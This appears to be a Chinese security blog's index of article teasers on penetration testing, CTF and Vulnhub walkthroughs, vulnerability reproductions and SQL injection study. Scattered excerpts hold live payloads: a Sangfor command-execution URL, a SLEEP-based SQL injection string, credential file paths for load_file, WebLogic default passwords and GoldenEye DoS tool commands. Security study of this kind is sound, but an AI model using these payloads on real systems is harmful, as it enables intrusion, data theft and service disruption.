【App渗透】用BurpSuite抓包安卓手机app内容（详细）

文章目录前言一、电脑端的配置二、BurpSuite的配置三、手机端的配置四、抓包总结前言很多情况下，在电脑的手机模拟器上面做app测试会存在大大小小的bug或者各种坑，而且有些模拟器很不方便，非常不好用。网上的教程虽然多，但是大…

log4j-CVE-2021-44228-vulhub复现

微信公众号：乌鸦安全扫取二维码获取更多信息！ 01 漏洞描述 Apache Log4j 2 是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于…

Log4J漏洞本地快速复现

微信公众号：乌鸦安全扫取二维码获取更多信息！ 01. 参考资料本复现大量参考： https://github.com/Yihsiwei/Log4j-exp 本次复现仅仅帮助他人本地复现漏洞。在网上已经有很多人复现漏洞，但是对于不会java的童鞋&#xff…

打Cookie小工具_BlueLotus_XSSReceiver

微信公众号：乌鸦安全扫取二维码获取更多信息！ 01 什么是打cookie？ 网上其实已经有很多非常好的解释了，在这里一句话总结下就是：在你访问的页面上执行了一次JS代码，这次代码执行之后可以获取你当前已经登录…

使用代理实现远程渗透测试

背景描述很多时候执行远程渗透测试时，客户会限制使用白名单访问（VPN除外）。这种时候我们一般会提供公司出口的IP地址，但是如果人不在公司就不能用此方法，这个时候我们只需要一个具有公网地址的服务器即可。有多种方式…

Vulnhub靶机Infosec_Warrior1渗透

靶机介绍官方下载地址： http://www.vulnhub.com/entry/infosecwarrior-ctf-2020-01,446/ 靶机难度：容易运行环境靶机：网络设为NAT模式，IP地址：192.168.174.141 攻击机：同网段下的kali linux&#xff0c…

Vulnhub靶机vulnuni1.0.1渗透

靶机介绍官方下载地址：http://www.vulnhub.com/entry/vulnuni-101,439/ 靶机目标是获取root权限，获取用户的flag，难度是容易运行环境靶机：网络设为NAT模式，IP地址：192.168.174.139 攻击机：同…

Cobalt srtike使用frp实现内网穿透

微信公众号：乌鸦安全扫取二维码获取更多信息！ 01 背景介绍在使用cobalt strike的场景中，很多时候会遇到内网机是Windows不出网，而外网机是Linux的，而且外网机只能获取到低权限来转发流量。如果此时想使用cobalt st…

74cms 6.0.20版本文件包含漏洞复现

微信公众号：乌鸦安全扫取二维码获取更多信息！ 01 漏洞描述参考资料： https://xz.aliyun.com/t/8021 由于74CMS 某些函数存在过滤不严格，攻击者通过构造恶意请求，配合文件包含漏洞可在无需登录的情况下执行任意代…

CVE-2020-0688 exchange远程代码执行漏洞

微信公众号：乌鸦安全扫取二维码获取更多信息！ 影响版本： Microsoft Exchange Server 2010 Service Pack 3 Microsoft Exchange Server 2013 Microsoft Exchange Server 2016 Microsoft Exchange Server 2019 漏洞介绍： 所…

SQL注入-安全狗apache3.5.12048版本超大数据包绕过

微信公众号：乌鸦安全扫取二维码获取更多信息！ 0x01 测试条件这个是get请求的，要求对方可以接收post请求，也就是说对方应该是request在发送请求的时候，要将bp的请求方式修改为post型将安全狗的cc防攻击功能关闭0x02…

Vulnhub靶机no_name渗透

靶机介绍官方下载地址：http://www.vulnhub.com/entry/haclabs-no_name,429/ 靶机获取shell比较难，提权比较容易，一共有三个flag在用户的家目录里面，需要在virtualbox运行，网络设为桥接运行环境靶机：网络…

kali2021.1安装教程及简单配置

一.下载kali 官网地址：www.Kali.org 1.用谷歌浏览器打开选择bt下载二.配置虚拟机vmware 1.选着典型就可以了 2.选择稍后安装ios 3.因为我们的kali是基于Debian系统的所有我们选择Debian 10.x64 4.选着安装的位置这里我选着默认 5.这里选择磁盘大小为100GB&am…

深信服行为感知系统远程命令执行

什么是男子汉?困难打不倒的人才是真正的男子汉！ 漏洞复现构造payload访问漏洞url： /tool/log/c.php?strip_slashessystem&hostipconfig漏洞证明： 文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢…

xss详解（一）

文章目录XSS详解（一）一、概述二、XSS的分类2.1反射型XSS2.2存储型XSS2.3DOM型XSS三、常见XSS攻击向量四、xss测试流程图XSS详解（一） 一、概述 XSS(Cross Site Scripting)缩写为CSS，因易与层叠样式表CSS混淆&#xff…

Nagios Core 复现

Nagios Core介绍Nagios-Core RCE 代码执行发现漏洞点漏洞危害漏洞验证介绍 Nagios 一款功能强大、优秀的开源监控系统发现和解决IT架构中存在的问题，避免这些问题影响到关键业务流程。 Nagios可以监控您的整个IT基础设施，以确保系统，应用程…

渗透测试-域渗透

一些推荐的资源 • 收集的一些安全书籍：http://sec-redclub.com/index.php/604.html • 安全思维导图：https://github.com/phith0n/Mind-Map • 内网渗透：https://github.com/l3m0n/pentest_study • 渗透学习：https://github.com…

渗透测试-安卓APP经验总结

安卓APP渗透总结抓包测试无法抓包对apk包的渗透测试渗透实战-挖掘某学校站点漏洞(APP漏洞)抓包测试无法抓包 burp抓包过程中发现无法抓到包，报错信息如下： java.security.cert.CertPathValidatorException: Trust anchor for certification path not…

实战渗透-fofa-dirBrute-代码审计-构造poc-ueditor-解密-过waf-Godzilla

关键词 —> 目标源码主域名没有子域信息收集中间件 IIS 8.5 输入admin发现自动添加了/ ------> 说明其目录存在， 盲猜文件，login.aspx default.aspx main.aspx 等等最终在login.aspx下面发现后台登录页面。猜弱口令 -----> 账号被锁 …

VulnStack靶场二

ATT&CK红队评估实战靶场二0x00 靶场搭建防火墙策略虚拟机快照版本web主机运行weblogic启动脚本问题：net view 显示 6118 error拓展：windows 宿主机工具利用（结合NAT）0x01 信息收集1、存活扫描ARP 快速2、端口服务扫描7001 端…

渗透测试和CTF Web中常用的浏览器插件

渗透测试和CTF Web中常用的浏览器插件以常用的chrome浏览器为例 Developer Tools 在遇到JS相关的题目的时候，可以直接在Console面板上运行JS代码 XSS题目中，可以在Element面板中很方便的定位到元素的位置 Hasher 可以快速的计算常见哈希算法&#…

.NET程序的反编译

.NET程序的反编译一个简单的C# program： using System; namespace dotnetapp {class Program{static void Main(string[] args){Console.WriteLine("What is your favourite Web Application Language?"); String answer Console.ReadLine();Console…

2023年Web安全学习路线总结！430页Web安全学习笔记（附PDF）

关键词：网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线、web安全攻防笔记、渗透测试路线图网络安全的范畴很大，相较于二进制安全等方向的高门槛、高要求，Web安全体系比较成熟，在现阶段来看，但凡有自己…

CTF安全竞赛介绍

目录一、赛事简介二、CTF方向简介 1.Web（Web安全） （1）简介 （2）涉及主要知识 2.MISC（安全杂项） （1）介绍 （2）涉及主要知识 3…

[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE)

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏养成习…

[ vulhub漏洞复现篇 ] vulhub 漏洞集合 - 表格版本（含漏洞复现文章连接）

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 [_PowerShell](https://blog.csdn.net/qq_51577576) ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋 🎉欢迎关注💗…

[ vulhub漏洞复现篇 ] Jetty 不明确路径信息泄露漏洞（CVE-2021-28164）

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末…

[ vulhub漏洞复现篇 ] Apche log4j远程代码执行漏洞(CVE-2021-44228)

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末…

[ 渗透入门篇 ] 从渗透测试执行标准着手的渗透学习大纲。掌握了这些知识点还担心找不到工作？

想要学好渗透，就必须须知渗透测试流程标准。这篇文章根据诸葛建伟翻译脑图来介绍渗透率流程执行标准。以思维导图为主，后续会有每一个知识点的详细介绍。学会了这些知识点，工作应该是妥妥的。一、渗透测试执行标准： 渗透测试执…

渗透测试--Windows提权

Windows提权常见提权方法溢出漏洞提权（系统提权） 数据库提权第三方应用软件提权 CMD命令无法执行的原因分析 1、主要原因是CMD.exe被管理员降权或者删除，也有可能是组件被删除 2、解决办法通过脚本木马查找可读写目录，上…

http(s)拒绝服务攻击工具--GoldenEye

http/https拒绝服务攻击工具–GoldenEye 获取方法： kali中直接wget： wget https://github.com/jseidl/GoldenEye/archive/master.zip 使用方法： ./goldeneye.py http://... -w 50./goldeneye.py http://... -w 50 -m randomGoldenEye is …

安全界瑞士军刀--Netcat常用命令

瑞士军刀Netcat常用命令 1. 查看目标IP地址的指定的端口是否开启如： nc -nv 11.11.11.11 80 //判断80端口是否开启 -nv是信息收集过程中经常使用的参数，在nmap也经常会用到 -n: 对IP地址进行探测，但不会对域名进行探测，即没有D…

网络分析Wireshark常见filter指令及描述

网络分析Wireshark常见filter指令及描述 Filter筛选用途描述eth.addr / eth.dst / eth.srcMACrip.auth.passwdRIP passwordip.addr / ip.dst / ip.srcIPtcp.port / tcp.dstport / tcp.srcportTCP portstcp.flags(ack, fin, reset, syn…)TCP flagsudp.port / udp.dstport / ud…

内网渗透——针对hash的攻击

0x01 前言本文从hash获取方式，爆破hash，hash中转，中继等方面全面分析，以直观详细的实践来了解攻击过程，过程比较详细，请耐心观看。 0x02 什么是NTLM-hash、net NTLM-hash NTLM hash是windows登录密码的一…

永恒之蓝

永恒之蓝（ms17-010） ms17-010,2017年最火的漏洞，没有之一。今天重温一下。渗透准备 win7kali 并且确保两台主机在同一个网段。可以相互ping通。可以互相ping通进入msf 使用search 命令进行查找然后使用show options查看和配置。配置…

vulnhub靶场，XXE LAB: 1

vulnhub靶场，XXE LAB: 1 环境准备靶机下载地址：https://www.vulnhub.com/entry/xxe-lab-1,254/ 攻击机：kali（192.168.109.128） 靶机：XXE LAB: 1（192.168.109.195） 下载好靶机之后…

vulnhub靶场，WALLABY‘S: NIGHTMARE (V1.0.2)

vulnhub靶场，WALLABY’S: NIGHTMARE (V1.0.2) 环境准备靶机下载地址：https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/ 攻击机：kali（192.168.109.128） 靶机：WALLABY’S: NIGHTMARE (V1.0.2)…

vulnhub靶场，Raven2

vulnhub靶场，Raven2 环境准备靶机下载地址：https://www.vulnhub.com/entry/raven-2,269/ 攻击机：kali（192.168.58.130） 靶机：Raven2（192.168.58.157） 下载好靶机之后直接使用VMwa…

网络安全--风险评估

风险评估 what is 对各方面风险进行辨识和分析的过程，是依据国际/国家有关信息安全技术标准，评估信息系统的脆弱性、面临的威胁以及脆弱性被威胁利用的可能性，和利用后对信息系统及由其处理、传输和存储的信息的保密性、完整性和可用性锁产…

安全巡检

安全巡检目的识别信息系统存在的安全脆弱性、分析信息系统存在的风险，并及时采取措施予以整改，保障信息系统安全稳定运行巡检收益 1、通过专业、严谨的安全巡检服务，确保客户IT环境的安全性和稳定性 2、大大降低客户的运维风险和运维成本 3、专业的安全技术和专业的…

网络安全---等级保护

网络安全等级保护 what is 等保，即网络安全等级保护标准 2007年我国信息安全等级保护制度正式实施等保标准具有很强的实用性它是监管部门合规执法检查的依据，是我国诸多网络信息安全标准制度的重要参考体系架构，是行业主管部门对于下级部门网络安全建设的指引标准的重要依…

网络应急响应流程

网络应急响应流程及工作内容 What is 应急响应对应的英文是 Incident response或emergency responcse，通常是指一个组织为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措施。当企业发生黑客入侵、系统崩溃货其他影响业务正常运行的安全时间是&a…

DoS和DDoS拒绝服务

DoS拒绝服务简介 DoS拒绝服务利用程序漏洞或一对一资源耗尽的Denial of Service拒绝服务 DDoS分布式拒绝服务一对一的攻击完全拼各自的资源，效果差多对一的攻击汇聚资源能力，重点在于量大，属于资源耗尽型历史以前：欠缺技术能力的无赖，我ping死你（最难缠的无…

渗透测试--ARP攻击

ARP攻击简介 ARP（address resolution protocol 地址解析协议）在局域网中，网络实际传输的是“帧”，帧里面包含有目标主机的MAC地址，在以太网中一个主机要和另外一个主机进行通信，必须要知道目标主机的MAC…

渗透测试--内网渗透

内网渗透介绍方法第一种方法：在具备Webshell的情况下，通过Webshell直接上传CS木马到对方服务器运行，在CS软件上面开启SocksProxy代理，把kail直接通过cs socksProxy代理攻击内网进行横向渗透。第二种方法：通过r…

渗透测试--Linux提权

Linux提权 linux发行版本 CentOS 运维人员，系统简单，适合服务器 Redhat 运维 Ubuntu 开发人员 Kali 安全人员，集成安全测试环境和工-具 Linux内核版本 Linux内核版本号由3组数字组成，第一组为内核主版本号，…

Weblogic 默认弱口令汇总及上传webshell

Weblogic 默认弱口令汇总及上传webgetshell 漏洞概述: 弱口令，弱口令，弱口令，重要事情说三遍。默认弱口令： 账户密码systempasswordweblogicweblogicguestguestportaladminportaladminadminsecurityjoepasswordmarypasswords…

信息搜集 - DNS

0x00：前言在搜集域名相关的信息时，除了使用上一篇记录的 nslookup 命令外，dig 也是经常用的一个工具比 nslookup 更强大。 0x01：dig dig 也是用来查询域名的相关信息的，和 nslookup 相似，但更强大&…

信息搜集-nslookup

0x00：前言被动信息搜集中，可以使用nslookup工具来搜集目标的ip以及各种解析记录，这个命令在win和linux中都是自带的，可以直接使用。 0x01：常见的记录 a记录：将域名解析为ipv4地址。 cname记录&#xff…

【网络攻防】网络扫描工具Nmap的使用

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录实验目的实验环境一、zenmap（图形化界面）1.观察界面2.扫描主机3.扫描服务器二、namp命令行模式1.命令格式2.命令实验三、新一代安全工具 - Go…

MySQL注入load_file常用路径

原文传送门：http://www.cnblogs.com/lcamry/p/5729087.html WINDOWS下: c:/boot.ini //查看系统版本 c:/windows/php.ini //php配置信息 c:/windows/my.ini //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码 c:/winnt/php.ini c:/winnt/my.ini c:\…

SQL注入学习笔记

一、前言记录自己在阅读《SQL注入与防御》中学习到的一些SQL注入小姿势二、检索嵌入在数据库返回错误中的信息 1.将字符串转为整数来产生错误例：发送0/version作为部分注入代码（SQL Server），数据库将会尝试将version的结果…

DVWA安装配置教程

原文传送门：http://www.cnblogs.com/yaochc/p/5049832.html DVWA 安装教程： 1 直接下载WampServer，免去了需要安装apache/php/mysql的服务器软件的痛苦，一体集成，相当于安装了httpd、PHP、MySQL、php-mysql等应用或…

SQL报错型盲注教程（原理全剖析）

一、前言在学习了普通的SQL注入，普通的盲注后，进入到报错型的盲注学习本教程基于sqli-labs的level 5进行实验二、正文报错型盲注众所周知，盲注并不会返回错误信息，使得sql注入的难度提高。而报错型注入则是利用了MySQL的…

Sql注入截取字符串常用函数

原文传送门：http://www.cnblogs.com/lcamry/p/5504374.htm 在sql注入中，往往会用到截取字符串的问题，例如不回显的情况下进行的注入，也称为盲注，这种情况下往往需要一个一个字符的去猜解，过程中需要用到截…

DVWA-master新手指南之SQL Injection（二）

一、前言时隔快一个月的第二部DVWA-master新手指南，今天我们来到SQL Injection SQL Injection：SQL注入，有趣的攻击技术，让人入迷。因为在《SQL注入思路分析（入门必看）》和《SQL布尔型盲注思路分析&…

SQLMAP帮助文档全解析

一、前言本文章为读取sqlmap -hh详细使用帮助后进行翻译的文章，一为自己查询方便，二则是提供一个使用文档的说明参考下面的每一个点都用横线分割开来，各位也可以在目录处找到你想要查阅的内容，文章较长，建议使用目…

SQL布尔型盲注思路分析（入门必看）

一、前言本文与《SQL注入思路分析（入门必看）》一脉相承，讲解手工盲注的思路和步骤这里采用DVWA low级别的SQL Injection(blind)来做演示二、正文盲注与其他注入有所不同，普通注入查询正确会返回结果而在盲注的sql查询中&am…

SQL注入思路分析（入门必看）

一、前言最近正在学习SQL注入，纵观各种教程，有稍微讲解一下直接po步骤的，有对原理讲的很仔细的但步骤不明确的，因此便想做一个教程，将每一步写清楚，将思路理顺，让SQL注入入门不再困难&#xff…

SQL注入入门（一）——SQL注入初认识

一、写在前面作为一名安全人员，SQL注入是我们必不可少的利器，下面我们一起来学习SQL注入二、参考文献 SQL注入攻击与防御，也可以说是本书的学习笔记三、正文 （一）SQL注入简介 SQL注入是一种将SQL代码插入或添加到…

Sql注入中连接字符串常用函数

原文章传送门： http://www.cnblogs.com/lcamry/p/5715634.html 在select数据时，我们往往需要将数据进行连接后进行回显。很多的时候想将多个数据或者多行数据进行输出的时候，需要使用字符串连接函数。在sqli中，常见的字符串连接…

获取齐治堡垒机任意用户登录权限

他一个人呆呆地坐在禾场边上，望着满天的星星，听着小河水朗朗的流水声，陷入了一种说不清楚的思绪之中。这思绪是散乱而飘浮的，又是幽深而莫测的。他突然感觉到，在他们这群山包围的双水村外面，有一个辽阔的大…

渗透测试标准

平时工作中的内容，主要是针对 web、app、小程序、公众号这些进行的渗透测试，严格来说，只属于渗透测试中的一个阶段，并不是整个的渗透测试内容，所以不能觉得自己可以找一些常规 top10 问题就很厉害，可以在网…

获取webshell的方法

获取webshell的方法 CMS获取webshell 通过搜索引擎搜索CMS网站程序名称 phpcms拿Webshell、WordPress后台拿Webshell等非CMS获取webshell 1、数据库备份获取webshell 1、上传图片木马并获取上传后图片访问地址2、利用后台数据库备份方法，备份图片木马，并重命名（名称+后缀…

WAF安装与绕过

WAF安装与绕过 WAF简介网站WAF是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能等模块。能够为用户提…

渗透测试-任意文件下载

任意文件下载漏洞介绍一些网站由于业务需求，往往需要提供文件查看或文件下载功能，但若对用户查看或下载的文件不做限制，则恶意用户就能够查看或下载任意敏感文件，这就是文件查看与下载漏洞。利用 …/ 跳转上级目录&#xff…

网络空间安全专业未来的发展前景以及薪资待遇如何？

不管是考虑未来报读专业的准大学生，还是初入职场的实习生，亦或是想要跳槽转岗的职场人，当我们开始选择一份工作时，本质上都在考虑以下三个问题： 这份工作的收入水平如何；这份工作有没有发展前景&#xff1…

秋招冲刺：网络安全工程师入围成功之旅！！

前言又到了每年校招的时刻，回想起 2018 年校招的我，只能说一把辛酸泪。作为一名某不知名学校的本科生，大学学的专业是网络工程专业，虽然学校不算太差，但在各种 211、985 大学面前，还是有很大竞争力的&a…

常见的网络安全术语有那些？

1、黑帽为非法目的进行黑客攻击的人，通常是为了经济利益。他们进入安全网络以销毁，赎回，修改或窃取数据，或使网络无法用于授权用户。这个名字来源于这样一个事实：老式的黑白西部电影中的恶棍很容易被电影观众识别&am…

DoS、DDoS工具Cobalt Strike

Cobalt Strike 简介 Cobalt Strike是一款美国Red Team开发的渗透测试神器，常被业界人称为CS。最近这个工具大火，成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式，集成了提权，凭据导出，端口转发&#xf…

明确目标、探测

明确目标 1、确定范围：测试目标范围，IP,域名，内外网 2、确定规则：能渗透到什么程度，渗透时间限制，能否修改上传？能否提权 3、确定所需：web应用的漏洞(新上线程序)？业务…

看完这篇教你玩转渗透测试靶机vulnhub——DC2

Vulnhub靶机DC2渗透测试详解Vulnhub靶机介绍：Vulnhub靶机下载：Vulnhub靶机安装：Vulnhub靶机漏洞详解：①：信息收集：②：暴力破解：④：登入后台：⑤：PA…

看完这篇教你玩转渗透测试靶机Vulnhub——DriftingBlues-6

Vulnhub靶机driftingblues6_vh渗透测试详解Vulnhub靶机介绍：Vulnhub靶机下载：Vulnhub靶机漏洞详解：①：信息收集：②：开始目录爆破：③：暴力破解zip：③：上传WebS…

ORM 注入

0x00：介绍 ORM 注入是 Object Relational Mapping 的缩写，翻译过来就是对象关系映射。ORM 是写程序时的一种写法，以前写程序查数据库的时候都是代码加 sql 语句写到一起，程序庞大后就很难管理，很难维护。后来就把程序…

暴力破解定义和预防

0x00：定义暴力破解可分为两种，一种是针对性的密码爆破，另外一种是扩展性的密码喷洒。密码爆破：密码爆破一般很熟悉，即针对单个账号或用户，用密码字典来不断的尝试，直到试出正确的密码&#…

渗透测试之信息搜集

现在很多测试者，不论是在公司测试项目，还是身为白帽子挖洞，大部分都是拿到就开始直接测，其实信息搜集作为渗透测试的第一个阶段，其重要性还是毋庸置疑的，我把之前关于信息搜集的内容整理了一下，…

信息搜集 - shodan

0x00：简介 shodan 可以理解成搜索引擎，和谷歌百度类似，只不过 shodan 专注的是搜索联网的设备。在渗透测试信息搜集的阶段，可以使用 shodan 来搜索下目标的相关信息。地址是 shodan.io。 0x01：语法 hostname&#x…

WebLogic SSRF漏洞攻击内网Redis以及反弹shell

WebLogic SSRF漏洞攻击内网Redis以及反弹shell 漏洞概述: -通俗的讲weblogci是一种web容器，首先判断redis(内网ip和端口)，由于Redis是通过换行符来分隔每条命令，可以通过传入%0a%0d来注入换行符，发送redis命令，将弹s…

CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)

漏洞描述 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞，允许未经身份验证的远程攻击者进行目录遍历攻击并读取目标系统上的敏感文件&#xff0c…

致远OA-ajax.do任意文件上传漏洞

致远OA-ajax.do任意文件上传漏洞漏洞描述致远OA是一套办公协同管理软件。近日，奇安信CERT监测到致远OA的相关漏洞信息。由于致远OA旧版本某些接口存在未授权访问，以及部分函数存在过滤不足，攻击者通过构造恶意请求，可在无需登…

利用Redis未授权漏洞实现getshell

(1)写ssh-keygen公钥然后使用私钥登陆在以下条件下，可以利用此方法 Redis服务使用ROOT账号启动服务器开放了SSH服务，而且允许使用密钥登录，即可远程写入一个公钥，直接登录远程服务器。 1:本地建立ssh的密钥 ssh-keygen -t rsa…

Kioptrix 2014 (#5)

目标:Kioptrix 2014 (#5) 攻击机:kali(192.168.1.107) 网关:192.168.1.255 #1端口探测 nmap 192.168.1.159 -O -sV -sS -O 系统探测 -sV 探测开启的端口来获取服务、版本信息 -sS 使用SYN扫描 #2访问80和8080端口查看网页源代码访问 http://192.168.1.159/pChart2.1.3…

泛微云桥e-Bridge任意文件读取

泛微云桥e-Bridge任意文件读取漏洞 0x00漏洞影响版本: 该漏洞几乎影响2018-2019全版本。 0x01漏洞利用: 默认密码sysadmin/1 fofa搜索语句:title“泛微云桥” 主要成因 /wxjsapi/saveYZJFil接口获取filepath，返回数据包内出现了程序的绝对路径，攻击者…

渗透测试学习目录

网络攻击防范课程介绍 1 HTML 01 HTML标签和文本属性 02 form表单 input 标签属性 03 a标签 img标签 table标签 04 无序列表和有序列表 05 frameset frame 框架的使用 2 div css基础 01 样式类型和样式选择器 02 背景和边框 03 文字和文本的属性 04 列表样式和伪类超链接…

2023-0Day（漏洞检测Tools）HW-漏洞挖掘-src

工具介绍为更好帮助师傅们日常安全巡检期间及攻防演练期间进行安全自查检测，编写了2023公开漏洞的检测工具 8月22日漏洞检测Tools V1.0更新漏洞利用如下： 1、用友移动管理系统文件上传漏洞（YonyouMa UPload） 2、用友NC-gro…

鸡肋的RDP反制

更新时间：2023年07月19日09:18:29 为什么叫鸡肋： 鸡肋者，食之无肉，弃之有味。你说不能成吧，但是有成功案例，你说成了吧，要求太高，还要看运气的。一句话：对方需要开启…

启莱OA treelist.aspx SQL注入

子曰：“为政以德，譬如北辰，居其所，而众星共之。” 漏洞复现访问漏洞url： 使用SQLmap对参数 user 进行注入漏洞证明： 文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感…

ShopXO商城系统文件上传0Day代审历程

Git仓库： https://github.com/gongfuxiang/shopxo简介： 两天攻防中，某政局内网横向发现多网段服务器，该服务器搭建了ShopXO商城系统(后来发现是开发临时搭建的，准备做二开用的)。结果花了30来秒审了个垃圾Day拿下该服…

【漏洞复现】金和OA存在任意文件读取漏洞

漏洞描述金和OA协同办公管理系统C6软件（简称金和OA），本着简单、适用、高效的原则，贴合企事业单位的实际需求，实行通用化、标准化、智能化、人性化的产品设计，充分体现企事业单位规范管理、提高办公效率的核心思想，为用户提供一整套标准的办公自动化解决方案，以帮助企…

【漏洞复现】致远OA wpsAssistServlet接口存在任意文件上传漏洞

漏洞描述致远OA互联新一代智慧型协同运营平台以中台的架构和技术、协同、业务、连接、数据的专业能力，夯实协同运营中台的落地效果；以移动化、AI智能推进前台的应用创新，实现企业轻量化、智能化业务场景，促进企业全过程管理能效，赋予企业协同工作和运营管理的新体验；在…

一个CVE漏洞预警知识库

CVE 0x01 免责声明本仓库所涉及的技术、思路和工具仅供安全技术研究，任何人不得将其用于非授权渗透测试，不得将其用于非法用途和盈利，否则后果自行承担。无exp/poc，部分包含修复方案 0x02 项目导航 2022.12 CVE-2022-3328&a…

Raven2靶机渗透

1. 信息收集 1.1 主机探测 sudo arp-scan -l1.2 端口扫描 nmap -p- -A 192.168.16.185开放了80端口，尝试登录网址查看信息，通过浏览器插件找出指纹 1.3 目录扫描访问登录界面，发现remember Me怀疑是shiro界面登录/vendor/界面&#xff0…

ezEIP信息泄露

漏洞描述 ezEIP存在信息泄露漏洞，通过遍历Cookie中的参数值获取敏感信息漏洞复现漏洞Url为 /label/member/getinfo.aspx访问时添加Cookie（通过遍历获取用户的登录名电话邮箱等信息） WHIR_USERINFORwhir_mem_member_pid1;漏洞证明&…

发货100虚拟商品自动发货系统存在SQL注入

漏洞描述该系统存在SQL注入漏洞，可获取敏感信息及账号密码。漏洞复现构造SQL注入延时payload： M_id11%20AND%20(SELECT%208965%20FROM%20(SELECT(SLEEP(5)))sdhh)&typeproduct漏洞证明： 文笔生疏，措辞浅薄，…

DocCMS keyword SQL注入

漏洞描述 DocCMS keyword参数存在 SQL注入漏洞，攻击者通过漏洞可以获取数据库信息漏洞复现访问url： 漏洞证明： 文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免责声明：由于传播或利…

一次暴露面全开的红帽渗透测试【getshell】

0x01、信息收集阶段注：本次信息收集过程主要使用FOFA网络探测平台 https://fofa.info/ 一开始进行收集的时候，有点迷，直接进行了大面积的"gov.in"域名收集 host"gov.in" && country"IN"哈哈68465条…

ShopXO download 任意文件读取

漏洞描述 ShopXO存在任意文件读取漏洞，攻击者可利用该漏洞获取敏感信息漏洞复现访问url： 构造payload 漏洞证明： 文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免责声明：由于传播或…

AES与DES加密解密算法

一、AES简介 AES（Advanced Encryption Standard，高级加密标准）的出现，是因为以前使用的DES算法密钥长度较短，已经不适应当今数据加密安全性的要求，因此2000年10月2日，美国政府宣布将比利时密码…

自学网络安全（黑客）全网详细路线

前言 web渗透是网络安全大行业里入门板块，就像十年前的软件，前景非常被看好，薪资也很诱人。与软件测试和前端开发只需掌握一定的编程能力不同的是，渗透需要掌握的知识内容较多，花费的时间较长，渗透测试掌握…

OffSec Labs Proving grounds Play——FunboxEasyEnum

文章目录端口扫描目录扫描文件上传漏洞利用查看用户爆破密码sudo提权flag位置FunboxEasyEnum writeup walkthrough Funbox： EasyEnum ~ VulnHub Enumeration Brute-force the web server’s files and directories. Be sure to check for common file extensions. Remote…

Metasploitable2靶机漏洞复现

一、信息收集 nmap扫描靶机信息二、弱口令 1.系统弱口令在Kali Linux中使用telnet远程连接靶机输入账号密码msfadmin即可登录 2.MySQL弱口令使用mysql -h 靶机IP地址即可连接 3.PostgreSQL弱密码登录输入psql -h 192.168.110.134 -U postgres 密码为postgres 输入\…

锐捷ISG账号密码泄露漏洞

查看源代码，搜索password获取管理员账号密码： 之后，可以通过在线网站对该 MD5 值进行解密，并且我们发现这还是弱口令： 下面可以使用上一步查找到的账号和解密后的密码登录成功文笔生疏，措辞浅薄&#x…

利用metasploit生成反弹shell程序，实现远程控制

1. 关于metasploit Metasploit是一款开源的渗透测试框架，由Rapid7公司开发和维护。它提供了一套强大的工具和资源，用于评估和测试计算机系统的安全性。Metasploit的目标是帮助安全专业人员发现和利用系统中的漏洞，以便改进系统的安全性。 Met…

帆软报表系统SSRF

有子曰：“信近于义，言可复也。恭近礼，远耻辱也。因不失其亲，亦可宗也。” SSRF 构造payload，访问漏洞url： /ReportServer?opresource&resourcehttp://x.x.x漏洞证明： 文笔生疏&#xf…

【漏洞复现】泛微e-Weaver SQL注入

漏洞描述泛微e-Weaver（FANWEI e-Weaver）是一款广泛应用于企业数字化转型领域的集成协同管理平台。作为中国知名的企业级软件解决方案提供商，泛微软件（广州）股份有限公司开发和推广了e-Weaver平台。泛微e-Weaver旨在…

2023年8大在线渗透测试工具介绍与分析

随着企业参与数字化运动，网络安全已成为大多数董事会讨论的一个重要方面。事实上，最近的一份报告显示，2022 年网络犯罪造成的损失总额达到惊人的 103 亿美元。这就是在线渗透测试工具在网络安全中受到关注的地方。今天，我们希…

渗透测试流程是什么？7个步骤给你讲清楚！

在学习渗透测试之初，有必要先系统了解一下它的流程，静下心来阅读一下，树立一个全局观，一步一步去建设并完善自己的专业领域，最终实现从懵逼到牛逼的华丽转变。渗透测试是通过模拟恶意黑客的攻击方法，同时也…

红队打靶：Me and My Girlfriend打靶思路详解（vulnhub）

目录写在开头第一步：主机发现和端口扫描第二步：Web渗透（修改XFF代理） 第三步：数据库手工枚举第四步：sudo php提权总结与思考写在开头本篇博客在自己的理解之上根据大佬红队笔记的视频进行…

Access注入 - Cookie注入

